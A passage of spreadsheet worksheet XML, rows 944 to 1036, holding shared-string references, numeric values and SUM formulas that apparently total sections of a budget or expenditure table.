      <c r="D944" s="10" t="s">
        <v>5657</v>
      </c>
      <c r="E944" s="16" t="s">
        <v>3719</v>
      </c>
      <c r="F944" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="945" spans="1:6">
      <c r="A945" s="10"/>
      <c r="B945" s="10"/>
      <c r="C945" s="28"/>
      <c r="D945" s="10" t="s">
        <v>5658</v>
      </c>
      <c r="E945" s="16" t="s">
        <v>3720</v>
      </c>
      <c r="F945" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="946" spans="1:6">
      <c r="A946" s="10"/>
      <c r="B946" s="10"/>
      <c r="C946" s="28"/>
      <c r="D946" s="10" t="s">
        <v>5659</v>
      </c>
      <c r="E946" s="16" t="s">
        <v>3721</v>
      </c>
      <c r="F946" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="947" spans="1:6">
      <c r="A947" s="10"/>
      <c r="B947" s="10"/>
      <c r="C947" s="28"/>
      <c r="D947" s="10" t="s">
        <v>5660</v>
      </c>
      <c r="E947" s="11" t="s">
        <v>3722</v>
      </c>
      <c r="F947" s="12">
        <f>SUM(F948:F953)</f>
        <v>2769</v>
      </c>
    </row>
    <row r="948" spans="1:6">
      <c r="A948" s="10"/>
      <c r="B948" s="10"/>
      <c r="C948" s="28"/>
      <c r="D948" s="10" t="s">
        <v>5661</v>
      </c>
      <c r="E948" s="16" t="s">
        <v>3723</v>
      </c>
      <c r="F948" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="949" spans="1:6">
      <c r="A949" s="10"/>
      <c r="B949" s="10"/>
      <c r="C949" s="28"/>
      <c r="D949" s="10" t="s">
        <v>5662</v>
      </c>
      <c r="E949" s="16" t="s">
        <v>3724</v>
      </c>
      <c r="F949" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="950" spans="1:6">
      <c r="A950" s="10"/>
      <c r="B950" s="10"/>
      <c r="C950" s="28"/>
      <c r="D950" s="10" t="s">
        <v>5663</v>
      </c>
      <c r="E950" s="16" t="s">
        <v>3725</v>
      </c>
      <c r="F950" s="17">
        <v>1476</v>
      </c>
    </row>
    <row r="951" spans="1:6">
      <c r="A951" s="10"/>
      <c r="B951" s="10"/>
      <c r="C951" s="28"/>
      <c r="D951" s="10" t="s">
        <v>5664</v>
      </c>
      <c r="E951" s="16" t="s">
        <v>3726</v>
      </c>
      <c r="F951" s="17">
        <v>1049</v>
      </c>
    </row>
    <row r="952" spans="1:6">
      <c r="A952" s="10"/>
      <c r="B952" s="10"/>
      <c r="C952" s="28"/>
      <c r="D952" s="10" t="s">
        <v>5665</v>
      </c>
      <c r="E952" s="16" t="s">
        <v>3727</v>
      </c>
      <c r="F952" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="953" spans="1:6">
      <c r="A953" s="10"/>
      <c r="B953" s="10"/>
      <c r="C953" s="28"/>
      <c r="D953" s="10" t="s">
        <v>5666</v>
      </c>
      <c r="E953" s="16" t="s">
        <v>3728</v>
      </c>
      <c r="F953" s="17">
        <v>244</v>
      </c>
    </row>
    <row r="954" spans="1:6">
      <c r="A954" s="10"/>
      <c r="B954" s="10"/>
      <c r="C954" s="28"/>
      <c r="D954" s="10" t="s">
        <v>5667</v>
      </c>
      <c r="E954" s="11" t="s">
        <v>3729</v>
      </c>
      <c r="F954" s="12">
        <f>SUM(F955:F956)</f>
        <v>0</v>
      </c>
    </row>
    <row r="955" spans="1:6">
      <c r="A955" s="10"/>
      <c r="B955" s="10"/>
      <c r="C955" s="28"/>
      <c r="D955" s="10" t="s">
        <v>5668</v>
      </c>
      <c r="E955" s="16" t="s">
        <v>3730</v>
      </c>
      <c r="F955" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="956" spans="1:6">
      <c r="A956" s="10"/>
      <c r="B956" s="10"/>
      <c r="C956" s="28"/>
      <c r="D956" s="10" t="s">
        <v>5669</v>
      </c>
      <c r="E956" s="16" t="s">
        <v>3731</v>
      </c>
      <c r="F956" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="957" spans="1:6">
      <c r="A957" s="10"/>
      <c r="B957" s="10"/>
      <c r="C957" s="28"/>
      <c r="D957" s="10" t="s">
        <v>5670</v>
      </c>
      <c r="E957" s="11" t="s">
        <v>3732</v>
      </c>
      <c r="F957" s="12">
        <f>SUM(F958:F959)</f>
        <v>241</v>
      </c>
    </row>
    <row r="958" spans="1:6">
      <c r="A958" s="10"/>
      <c r="B958" s="10"/>
      <c r="C958" s="28"/>
      <c r="D958" s="10" t="s">
        <v>5671</v>
      </c>
      <c r="E958" s="16" t="s">
        <v>3733</v>
      </c>
      <c r="F958" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="959" spans="1:6">
      <c r="A959" s="10"/>
      <c r="B959" s="10"/>
      <c r="C959" s="28"/>
      <c r="D959" s="10" t="s">
        <v>5672</v>
      </c>
      <c r="E959" s="16" t="s">
        <v>3734</v>
      </c>
      <c r="F959" s="17">
        <v>241</v>
      </c>
    </row>
    <row r="960" spans="1:6">
      <c r="A960" s="10"/>
      <c r="B960" s="10"/>
      <c r="C960" s="28"/>
      <c r="D960" s="10" t="s">
        <v>5673</v>
      </c>
      <c r="E960" s="11" t="s">
        <v>3735</v>
      </c>
      <c r="F960" s="12">
        <f>F961+F984+F994+F1004+F1009+F1016+F1021</f>
        <v>9773</v>
      </c>
    </row>
    <row r="961" spans="1:6">
      <c r="A961" s="10"/>
      <c r="B961" s="10"/>
      <c r="C961" s="28"/>
      <c r="D961" s="10" t="s">
        <v>5674</v>
      </c>
      <c r="E961" s="11" t="s">
        <v>3736</v>
      </c>
      <c r="F961" s="12">
        <f>SUM(F962:F983)</f>
        <v>7699</v>
      </c>
    </row>
    <row r="962" spans="1:6">
      <c r="A962" s="10"/>
      <c r="B962" s="10"/>
      <c r="C962" s="28"/>
      <c r="D962" s="10" t="s">
        <v>5675</v>
      </c>
      <c r="E962" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F962" s="17">
        <v>1704</v>
      </c>
    </row>
    <row r="963" spans="1:6">
      <c r="A963" s="10"/>
      <c r="B963" s="10"/>
      <c r="C963" s="28"/>
      <c r="D963" s="10" t="s">
        <v>5676</v>
      </c>
      <c r="E963" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F963" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="964" spans="1:6">
      <c r="A964" s="10"/>
      <c r="B964" s="10"/>
      <c r="C964" s="28"/>
      <c r="D964" s="10" t="s">
        <v>5677</v>
      </c>
      <c r="E964" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F964" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="965" spans="1:6">
      <c r="A965" s="10"/>
      <c r="B965" s="10"/>
      <c r="C965" s="28"/>
      <c r="D965" s="10" t="s">
        <v>5678</v>
      </c>
      <c r="E965" s="16" t="s">
        <v>3737</v>
      </c>
      <c r="F965" s="17">
        <v>2562</v>
      </c>
    </row>
    <row r="966" spans="1:6">
      <c r="A966" s="10"/>
      <c r="B966" s="10"/>
      <c r="C966" s="28"/>
      <c r="D966" s="10" t="s">
        <v>5679</v>
      </c>
      <c r="E966" s="16" t="s">
        <v>3738</v>
      </c>
      <c r="F966" s="17">
        <v>40</v>
      </c>
    </row>
    <row r="967" spans="1:6">
      <c r="A967" s="10"/>
      <c r="B967" s="10"/>
      <c r="C967" s="28"/>
      <c r="D967" s="10" t="s">
        <v>5680</v>
      </c>
      <c r="E967" s="16" t="s">
        <v>3739</v>
      </c>
      <c r="F967" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="968" spans="1:6">
      <c r="A968" s="10"/>
      <c r="B968" s="10"/>
      <c r="C968" s="28"/>
      <c r="D968" s="10" t="s">
        <v>5681</v>
      </c>
      <c r="E968" s="16" t="s">
        <v>3740</v>
      </c>
      <c r="F968" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="969" spans="1:6">
      <c r="A969" s="10"/>
      <c r="B969" s="10"/>
      <c r="C969" s="28"/>
      <c r="D969" s="10" t="s">
        <v>5682</v>
      </c>
      <c r="E969" s="16" t="s">
        <v>3741</v>
      </c>
      <c r="F969" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="970" spans="1:6">
      <c r="A970" s="10"/>
      <c r="B970" s="10"/>
      <c r="C970" s="28"/>
      <c r="D970" s="10" t="s">
        <v>5683</v>
      </c>
      <c r="E970" s="16" t="s">
        <v>3742</v>
      </c>
      <c r="F970" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="971" spans="1:6">
      <c r="A971" s="10"/>
      <c r="B971" s="10"/>
      <c r="C971" s="28"/>
      <c r="D971" s="10" t="s">
        <v>5684</v>
      </c>
      <c r="E971" s="16" t="s">
        <v>3743</v>
      </c>
      <c r="F971" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="972" spans="1:6">
      <c r="A972" s="10"/>
      <c r="B972" s="10"/>
      <c r="C972" s="28"/>
      <c r="D972" s="10" t="s">
        <v>5685</v>
      </c>
      <c r="E972" s="16" t="s">
        <v>3744</v>
      </c>
      <c r="F972" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="973" spans="1:6">
      <c r="A973" s="10"/>
      <c r="B973" s="10"/>
      <c r="C973" s="28"/>
      <c r="D973" s="10" t="s">
        <v>5686</v>
      </c>
      <c r="E973" s="16" t="s">
        <v>3745</v>
      </c>
      <c r="F973" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="974" spans="1:6">
      <c r="A974" s="10"/>
      <c r="B974" s="10"/>
      <c r="C974" s="28"/>
      <c r="D974" s="10" t="s">
        <v>5687</v>
      </c>
      <c r="E974" s="16" t="s">
        <v>3746</v>
      </c>
      <c r="F974" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="975" spans="1:6">
      <c r="A975" s="10"/>
      <c r="B975" s="10"/>
      <c r="C975" s="28"/>
      <c r="D975" s="10" t="s">
        <v>5688</v>
      </c>
      <c r="E975" s="16" t="s">
        <v>3747</v>
      </c>
      <c r="F975" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="976" spans="1:6">
      <c r="A976" s="10"/>
      <c r="B976" s="10"/>
      <c r="C976" s="28"/>
      <c r="D976" s="10" t="s">
        <v>5689</v>
      </c>
      <c r="E976" s="16" t="s">
        <v>3748</v>
      </c>
      <c r="F976" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="977" spans="1:6">
      <c r="A977" s="10"/>
      <c r="B977" s="10"/>
      <c r="C977" s="28"/>
      <c r="D977" s="10" t="s">
        <v>5690</v>
      </c>
      <c r="E977" s="16" t="s">
        <v>3749</v>
      </c>
      <c r="F977" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="978" spans="1:6">
      <c r="A978" s="10"/>
      <c r="B978" s="10"/>
      <c r="C978" s="28"/>
      <c r="D978" s="10" t="s">
        <v>5691</v>
      </c>
      <c r="E978" s="16" t="s">
        <v>3750</v>
      </c>
      <c r="F978" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="979" spans="1:6">
      <c r="A979" s="10"/>
      <c r="B979" s="10"/>
      <c r="C979" s="28"/>
      <c r="D979" s="10" t="s">
        <v>5692</v>
      </c>
      <c r="E979" s="16" t="s">
        <v>3751</v>
      </c>
      <c r="F979" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="980" spans="1:6">
      <c r="A980" s="10"/>
      <c r="B980" s="10"/>
      <c r="C980" s="28"/>
      <c r="D980" s="10" t="s">
        <v>5693</v>
      </c>
      <c r="E980" s="16" t="s">
        <v>3752</v>
      </c>
      <c r="F980" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="981" spans="1:6">
      <c r="A981" s="10"/>
      <c r="B981" s="10"/>
      <c r="C981" s="28"/>
      <c r="D981" s="10" t="s">
        <v>5694</v>
      </c>
      <c r="E981" s="16" t="s">
        <v>3753</v>
      </c>
      <c r="F981" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="982" spans="1:6">
      <c r="A982" s="10"/>
      <c r="B982" s="10"/>
      <c r="C982" s="28"/>
      <c r="D982" s="10" t="s">
        <v>5695</v>
      </c>
      <c r="E982" s="16" t="s">
        <v>3754</v>
      </c>
      <c r="F982" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="983" spans="1:6">
      <c r="A983" s="10"/>
      <c r="B983" s="10"/>
      <c r="C983" s="28"/>
      <c r="D983" s="10" t="s">
        <v>5696</v>
      </c>
      <c r="E983" s="16" t="s">
        <v>3755</v>
      </c>
      <c r="F983" s="17">
        <v>3393</v>
      </c>
    </row>
    <row r="984" spans="1:6">
      <c r="A984" s="10"/>
      <c r="B984" s="10"/>
      <c r="C984" s="28"/>
      <c r="D984" s="10" t="s">
        <v>5697</v>
      </c>
      <c r="E984" s="11" t="s">
        <v>3756</v>
      </c>
      <c r="F984" s="12">
        <f>SUM(F985:F993)</f>
        <v>0</v>
      </c>
    </row>
    <row r="985" spans="1:6">
      <c r="A985" s="10"/>
      <c r="B985" s="10"/>
      <c r="C985" s="28"/>
      <c r="D985" s="10" t="s">
        <v>5698</v>
      </c>
      <c r="E985" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F985" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="986" spans="1:6">
      <c r="A986" s="10"/>
      <c r="B986" s="10"/>
      <c r="C986" s="28"/>
      <c r="D986" s="10" t="s">
        <v>5699</v>
      </c>
      <c r="E986" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F986" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="987" spans="1:6">
      <c r="A987" s="10"/>
      <c r="B987" s="10"/>
      <c r="C987" s="28"/>
      <c r="D987" s="10" t="s">
        <v>5700</v>
      </c>
      <c r="E987" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F987" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="988" spans="1:6">
      <c r="A988" s="10"/>
      <c r="B988" s="10"/>
      <c r="C988" s="28"/>
      <c r="D988" s="10" t="s">
        <v>5701</v>
      </c>
      <c r="E988" s="16" t="s">
        <v>3757</v>
      </c>
      <c r="F988" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="989" spans="1:6">
      <c r="A989" s="10"/>
      <c r="B989" s="10"/>
      <c r="C989" s="28"/>
      <c r="D989" s="10" t="s">
        <v>5702</v>
      </c>
      <c r="E989" s="16" t="s">
        <v>3758</v>
      </c>
      <c r="F989" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="990" spans="1:6">
      <c r="A990" s="10"/>
      <c r="B990" s="10"/>
      <c r="C990" s="28"/>
      <c r="D990" s="10" t="s">
        <v>5703</v>
      </c>
      <c r="E990" s="16" t="s">
        <v>3759</v>
      </c>
      <c r="F990" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="991" spans="1:6">
      <c r="A991" s="10"/>
      <c r="B991" s="10"/>
      <c r="C991" s="28"/>
      <c r="D991" s="10" t="s">
        <v>5704</v>
      </c>
      <c r="E991" s="16" t="s">
        <v>3760</v>
      </c>
      <c r="F991" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="992" spans="1:6">
      <c r="A992" s="10"/>
      <c r="B992" s="10"/>
      <c r="C992" s="28"/>
      <c r="D992" s="10" t="s">
        <v>5705</v>
      </c>
      <c r="E992" s="16" t="s">
        <v>3761</v>
      </c>
      <c r="F992" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="993" spans="1:6">
      <c r="A993" s="10"/>
      <c r="B993" s="10"/>
      <c r="C993" s="28"/>
      <c r="D993" s="10" t="s">
        <v>5706</v>
      </c>
      <c r="E993" s="16" t="s">
        <v>3762</v>
      </c>
      <c r="F993" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="994" spans="1:6">
      <c r="A994" s="10"/>
      <c r="B994" s="10"/>
      <c r="C994" s="28"/>
      <c r="D994" s="10" t="s">
        <v>5707</v>
      </c>
      <c r="E994" s="11" t="s">
        <v>3763</v>
      </c>
      <c r="F994" s="12">
        <f>SUM(F995:F1003)</f>
        <v>0</v>
      </c>
    </row>
    <row r="995" spans="1:6">
      <c r="A995" s="10"/>
      <c r="B995" s="10"/>
      <c r="C995" s="28"/>
      <c r="D995" s="10" t="s">
        <v>5708</v>
      </c>
      <c r="E995" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F995" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="996" spans="1:6">
      <c r="A996" s="10"/>
      <c r="B996" s="10"/>
      <c r="C996" s="28"/>
      <c r="D996" s="10" t="s">
        <v>5709</v>
      </c>
      <c r="E996" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F996" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="997" spans="1:6">
      <c r="A997" s="10"/>
      <c r="B997" s="10"/>
      <c r="C997" s="28"/>
      <c r="D997" s="10" t="s">
        <v>5710</v>
      </c>
      <c r="E997" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F997" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="998" spans="1:6">
      <c r="A998" s="10"/>
      <c r="B998" s="10"/>
      <c r="C998" s="28"/>
      <c r="D998" s="10" t="s">
        <v>5711</v>
      </c>
      <c r="E998" s="16" t="s">
        <v>3764</v>
      </c>
      <c r="F998" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="999" spans="1:6">
      <c r="A999" s="10"/>
      <c r="B999" s="10"/>
      <c r="C999" s="28"/>
      <c r="D999" s="10" t="s">
        <v>5712</v>
      </c>
      <c r="E999" s="16" t="s">
        <v>3765</v>
      </c>
      <c r="F999" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1000" spans="1:6">
      <c r="A1000" s="10"/>
      <c r="B1000" s="10"/>
      <c r="C1000" s="28"/>
      <c r="D1000" s="10" t="s">
        <v>5713</v>
      </c>
      <c r="E1000" s="16" t="s">
        <v>3766</v>
      </c>
      <c r="F1000" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1001" spans="1:6">
      <c r="A1001" s="10"/>
      <c r="B1001" s="10"/>
      <c r="C1001" s="28"/>
      <c r="D1001" s="10" t="s">
        <v>5714</v>
      </c>
      <c r="E1001" s="16" t="s">
        <v>3767</v>
      </c>
      <c r="F1001" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1002" spans="1:6">
      <c r="A1002" s="10"/>
      <c r="B1002" s="10"/>
      <c r="C1002" s="28"/>
      <c r="D1002" s="10" t="s">
        <v>5715</v>
      </c>
      <c r="E1002" s="16" t="s">
        <v>3768</v>
      </c>
      <c r="F1002" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1003" spans="1:6">
      <c r="A1003" s="10"/>
      <c r="B1003" s="10"/>
      <c r="C1003" s="28"/>
      <c r="D1003" s="10" t="s">
        <v>5716</v>
      </c>
      <c r="E1003" s="16" t="s">
        <v>3769</v>
      </c>
      <c r="F1003" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1004" spans="1:6">
      <c r="A1004" s="10"/>
      <c r="B1004" s="10"/>
      <c r="C1004" s="28"/>
      <c r="D1004" s="10" t="s">
        <v>5717</v>
      </c>
      <c r="E1004" s="11" t="s">
        <v>3770</v>
      </c>
      <c r="F1004" s="12">
        <f>SUM(F1005:F1008)</f>
        <v>163</v>
      </c>
    </row>
    <row r="1005" spans="1:6">
      <c r="A1005" s="10"/>
      <c r="B1005" s="10"/>
      <c r="C1005" s="28"/>
      <c r="D1005" s="10" t="s">
        <v>5718</v>
      </c>
      <c r="E1005" s="16" t="s">
        <v>3771</v>
      </c>
      <c r="F1005" s="17">
        <v>163</v>
      </c>
    </row>
    <row r="1006" spans="1:6">
      <c r="A1006" s="10"/>
      <c r="B1006" s="10"/>
      <c r="C1006" s="28"/>
      <c r="D1006" s="10" t="s">
        <v>5719</v>
      </c>
      <c r="E1006" s="16" t="s">
        <v>3772</v>
      </c>
      <c r="F1006" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1007" spans="1:6">
      <c r="A1007" s="10"/>
      <c r="B1007" s="10"/>
      <c r="C1007" s="28"/>
      <c r="D1007" s="10" t="s">
        <v>5720</v>
      </c>
      <c r="E1007" s="16" t="s">
        <v>3773</v>
      </c>
      <c r="F1007" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1008" spans="1:6">
      <c r="A1008" s="10"/>
      <c r="B1008" s="10"/>
      <c r="C1008" s="28"/>
      <c r="D1008" s="10" t="s">
        <v>5721</v>
      </c>
      <c r="E1008" s="16" t="s">
        <v>3774</v>
      </c>
      <c r="F1008" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1009" spans="1:6">
      <c r="A1009" s="10"/>
      <c r="B1009" s="10"/>
      <c r="C1009" s="28"/>
      <c r="D1009" s="10" t="s">
        <v>5722</v>
      </c>
      <c r="E1009" s="11" t="s">
        <v>3775</v>
      </c>
      <c r="F1009" s="12">
        <f>SUM(F1010:F1015)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1010" spans="1:6">
      <c r="A1010" s="10"/>
      <c r="B1010" s="10"/>
      <c r="C1010" s="28"/>
      <c r="D1010" s="10" t="s">
        <v>5723</v>
      </c>
      <c r="E1010" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F1010" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1011" spans="1:6">
      <c r="A1011" s="10"/>
      <c r="B1011" s="10"/>
      <c r="C1011" s="28"/>
      <c r="D1011" s="10" t="s">
        <v>5724</v>
      </c>
      <c r="E1011" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F1011" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1012" spans="1:6">
      <c r="A1012" s="10"/>
      <c r="B1012" s="10"/>
      <c r="C1012" s="28"/>
      <c r="D1012" s="10" t="s">
        <v>5725</v>
      </c>
      <c r="E1012" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F1012" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1013" spans="1:6">
      <c r="A1013" s="10"/>
      <c r="B1013" s="10"/>
      <c r="C1013" s="28"/>
      <c r="D1013" s="10" t="s">
        <v>5726</v>
      </c>
      <c r="E1013" s="16" t="s">
        <v>3761</v>
      </c>
      <c r="F1013" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1014" spans="1:6">
      <c r="A1014" s="10"/>
      <c r="B1014" s="10"/>
      <c r="C1014" s="28"/>
      <c r="D1014" s="10" t="s">
        <v>5727</v>
      </c>
      <c r="E1014" s="16" t="s">
        <v>3776</v>
      </c>
      <c r="F1014" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1015" spans="1:6">
      <c r="A1015" s="10"/>
      <c r="B1015" s="10"/>
      <c r="C1015" s="28"/>
      <c r="D1015" s="10" t="s">
        <v>5728</v>
      </c>
      <c r="E1015" s="16" t="s">
        <v>3777</v>
      </c>
      <c r="F1015" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1016" spans="1:6">
      <c r="A1016" s="10"/>
      <c r="B1016" s="10"/>
      <c r="C1016" s="28"/>
      <c r="D1016" s="10" t="s">
        <v>5729</v>
      </c>
      <c r="E1016" s="11" t="s">
        <v>3778</v>
      </c>
      <c r="F1016" s="12">
        <f>SUM(F1017:F1020)</f>
        <v>1911</v>
      </c>
    </row>
    <row r="1017" spans="1:6">
      <c r="A1017" s="10"/>
      <c r="B1017" s="10"/>
      <c r="C1017" s="28"/>
      <c r="D1017" s="10" t="s">
        <v>5730</v>
      </c>
      <c r="E1017" s="16" t="s">
        <v>3779</v>
      </c>
      <c r="F1017" s="17">
        <v>204</v>
      </c>
    </row>
    <row r="1018" spans="1:6">
      <c r="A1018" s="10"/>
      <c r="B1018" s="10"/>
      <c r="C1018" s="28"/>
      <c r="D1018" s="10" t="s">
        <v>5731</v>
      </c>
      <c r="E1018" s="16" t="s">
        <v>3780</v>
      </c>
      <c r="F1018" s="17">
        <v>1640</v>
      </c>
    </row>
    <row r="1019" spans="1:6">
      <c r="A1019" s="10"/>
      <c r="B1019" s="10"/>
      <c r="C1019" s="28"/>
      <c r="D1019" s="10" t="s">
        <v>5732</v>
      </c>
      <c r="E1019" s="16" t="s">
        <v>3781</v>
      </c>
      <c r="F1019" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1020" spans="1:6">
      <c r="A1020" s="10"/>
      <c r="B1020" s="10"/>
      <c r="C1020" s="28"/>
      <c r="D1020" s="10" t="s">
        <v>5733</v>
      </c>
      <c r="E1020" s="16" t="s">
        <v>3782</v>
      </c>
      <c r="F1020" s="17">
        <v>67</v>
      </c>
    </row>
    <row r="1021" spans="1:6">
      <c r="A1021" s="10"/>
      <c r="B1021" s="10"/>
      <c r="C1021" s="28"/>
      <c r="D1021" s="10" t="s">
        <v>5734</v>
      </c>
      <c r="E1021" s="11" t="s">
        <v>3783</v>
      </c>
      <c r="F1021" s="12">
        <f>SUM(F1022:F1023)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1022" spans="1:6">
      <c r="A1022" s="10"/>
      <c r="B1022" s="10"/>
      <c r="C1022" s="28"/>
      <c r="D1022" s="10" t="s">
        <v>5735</v>
      </c>
      <c r="E1022" s="16" t="s">
        <v>3784</v>
      </c>
      <c r="F1022" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1023" spans="1:6">
      <c r="A1023" s="10"/>
      <c r="B1023" s="10"/>
      <c r="C1023" s="28"/>
      <c r="D1023" s="10" t="s">
        <v>5736</v>
      </c>
      <c r="E1023" s="16" t="s">
        <v>3785</v>
      </c>
      <c r="F1023" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1024" spans="1:6">
      <c r="A1024" s="10"/>
      <c r="B1024" s="10"/>
      <c r="C1024" s="28"/>
      <c r="D1024" s="10" t="s">
        <v>5737</v>
      </c>
      <c r="E1024" s="11" t="s">
        <v>3786</v>
      </c>
      <c r="F1024" s="12">
        <f>F1025+F1035+F1051+F1056+F1067+F1074+F1082</f>
        <v>3822</v>
      </c>
    </row>
    <row r="1025" spans="1:6">
      <c r="A1025" s="10"/>
      <c r="B1025" s="10"/>
      <c r="C1025" s="28"/>
      <c r="D1025" s="10" t="s">
        <v>5738</v>
      </c>
      <c r="E1025" s="11" t="s">
        <v>3787</v>
      </c>
      <c r="F1025" s="12">
        <f>SUM(F1026:F1034)</f>
        <v>84</v>
      </c>
    </row>
    <row r="1026" spans="1:6">
      <c r="A1026" s="10"/>
      <c r="B1026" s="10"/>
      <c r="C1026" s="28"/>
      <c r="D1026" s="10" t="s">
        <v>5739</v>
      </c>
      <c r="E1026" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F1026" s="17">
        <v>84</v>
      </c>
    </row>
    <row r="1027" spans="1:6">
      <c r="A1027" s="10"/>
      <c r="B1027" s="10"/>
      <c r="C1027" s="28"/>
      <c r="D1027" s="10" t="s">
        <v>5740</v>
      </c>
      <c r="E1027" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F1027" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1028" spans="1:6">
      <c r="A1028" s="10"/>
      <c r="B1028" s="10"/>
      <c r="C1028" s="28"/>
      <c r="D1028" s="10" t="s">
        <v>5741</v>
      </c>
      <c r="E1028" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F1028" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1029" spans="1:6">
      <c r="A1029" s="10"/>
      <c r="B1029" s="10"/>
      <c r="C1029" s="28"/>
      <c r="D1029" s="10" t="s">
        <v>5742</v>
      </c>
      <c r="E1029" s="16" t="s">
        <v>3788</v>
      </c>
      <c r="F1029" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1030" spans="1:6">
      <c r="A1030" s="10"/>
      <c r="B1030" s="10"/>
      <c r="C1030" s="28"/>
      <c r="D1030" s="10" t="s">
        <v>5743</v>
      </c>
      <c r="E1030" s="16" t="s">
        <v>3789</v>
      </c>
      <c r="F1030" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1031" spans="1:6">
      <c r="A1031" s="10"/>
      <c r="B1031" s="10"/>
      <c r="C1031" s="28"/>
      <c r="D1031" s="10" t="s">
        <v>5744</v>
      </c>
      <c r="E1031" s="16" t="s">
        <v>3790</v>
      </c>
      <c r="F1031" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1032" spans="1:6">
      <c r="A1032" s="10"/>
      <c r="B1032" s="10"/>
      <c r="C1032" s="28"/>
      <c r="D1032" s="10" t="s">
        <v>5745</v>
      </c>
      <c r="E1032" s="16" t="s">
        <v>3791</v>
      </c>
      <c r="F1032" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1033" spans="1:6">
      <c r="A1033" s="10"/>
      <c r="B1033" s="10"/>
      <c r="C1033" s="28"/>
      <c r="D1033" s="10" t="s">
        <v>5746</v>
      </c>
      <c r="E1033" s="16" t="s">
        <v>3792</v>
      </c>
      <c r="F1033" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1034" spans="1:6">
      <c r="A1034" s="10"/>
      <c r="B1034" s="10"/>
      <c r="C1034" s="28"/>
      <c r="D1034" s="10" t="s">
        <v>5747</v>
      </c>
      <c r="E1034" s="16" t="s">
        <v>3793</v>
      </c>
      <c r="F1034" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1035" spans="1:6">
      <c r="A1035" s="10"/>
      <c r="B1035" s="10"/>
      <c r="C1035" s="28"/>
      <c r="D1035" s="10" t="s">
        <v>5748</v>
      </c>
      <c r="E1035" s="11" t="s">
        <v>3794</v>
      </c>
      <c r="F1035" s="12">
        <f>SUM(F1036:F1050)</f>
        <v>1746</v>
      </c>
    </row>
    <row r="1036" spans="1:6">
      <c r="A1036" s="10"/>
      <c r="B1036" s="10"/>
      <c r="C1036" s="28"/>
      <c r="D1036" s="10" t="s">
        <v>5749</v>
      </c>
      <c r="E1036" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F1036" s="17">
